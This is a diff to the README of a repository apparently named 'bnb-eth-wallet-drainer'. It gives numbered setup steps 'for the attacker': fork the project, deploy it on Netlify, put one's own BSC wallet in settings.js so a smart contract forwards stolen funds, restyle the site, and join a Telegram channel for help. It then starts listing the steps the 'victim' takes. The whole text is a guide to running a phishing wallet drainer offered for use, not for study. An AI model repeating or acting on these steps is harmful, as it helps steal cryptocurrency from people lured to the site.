zeddstech/bnb-eth-wallet-drainer/README.md

 4. Add your wallet to settings.js file use bsc address

-Steps you have to do as the attacker
+Steps you have to do as the attacker (you)

 1. fork

 2. deploy on netify

-3. add bsc wallet to settings.js
+3. add bsc wallet to settings.js if you dont the smart contract will not foward it to you

-4. host a site
+4. go to netify and confirm deployment

+5. edit the html file if you want to change the site appearance for help join telegram

-Steps that the victim has to do
+Steps that the !!! victim !!! has to do

 1.first connect to bnb network